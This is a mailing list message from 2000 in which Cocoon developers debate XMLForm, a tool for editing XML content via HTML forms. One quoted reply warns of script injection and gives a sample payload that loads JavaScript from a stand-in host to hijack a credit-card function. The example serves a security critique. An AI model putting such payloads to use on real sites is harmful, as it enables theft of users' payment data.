cocoon-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Mark Washeim" <>
Subject Re: [announce] XMLForm - a new project using Xerces, Xalan, & JTidy
Date Sat, 04 Mar 2000 00:43:47 GMT
>> How else do you suppose content editors
>> are going to be able to edit site content over the web??
>Anybody heard of WebDAV?

We're about 2 weeks away from a prototype swing applet that works using
schemas to create interfaces to create and edit document instances. I'll
have designs posted Monday or tuesday and source, ASAP.

>> If you're worried
>> about users being able to fake forms, well, there's a reason it's a POST
>> only servlet. I'm already going to add origination URL restrictions.
>> > I think Donald's proposal is clever, but adds more problems than it
>> > solves. We must think about better ways to do the full loop
>> Can you elaborate? Right now, the only thing I don't like about XMLForm
>> having to write the XML fragment mockup in the HTML form using specially
>> named parameters. However, Eric van der Vlist has suggested an
>> alternate strategy that I may well adopt. That being said, I'm now
>> adding, editing, and removing fragments from my XML files through a nice
>> HTML form interface using XMLForm and cocoon. I'd rather like to know
>> problems you see with this approach.
>Like I said, it's clever to encode the logical structure of the data in
>their variable names.... still this is a very dangerous approach. You're
>asking for trouble.

>Not only you are allowing people to change your web content by forms
>(have you read the latest security reccomandation about cross-scripting?
>well, download Apache 1.3.12 to find out.) but you give them the power
>to place this content where they want in your tree.
>So, let's say, if Amazon allowed this in their page...something like
> text -> /document/comments/comment/text
>and instead I hack up the HTML page and do
> text -> /document/header/title
>I put "<div onload="invoque('http://myhost/myscript.js')"></div>"
>and overwrite the "sendCreditCardNumber()" method from their page
>cloning it to my own site.
>Without even having to hack their site.
>Do you deal with something like that?
>> It's not a proposal, anyway, it's a project. Proposal is when you say you
>> want to do something, project is when you have done something. :)
>Sorry, you're right.
>I think we need something like this
> <form>
>  <parameter name="whatever" defaultvalue="..." type="..."/>
>  ...
> </form>
> <xsp:handle
>that should generate the producer able to handle both GET (and create
>the form) and POST (and process the form doing security tests).
>This is what I mean by loop.
> request -(get)-> form to fill -(post)-> response
>all compiled into one XSP that takes care of everything (hopefully
>backed up with some OODBMS of some sort... either XML based or EJB

I'm not sure if any one was paying attention, but, we'll also present full
cycle EJB session (container persistance managed) to XML (via KBML) to HTML
(XSL generated form) and Back again.

View raw message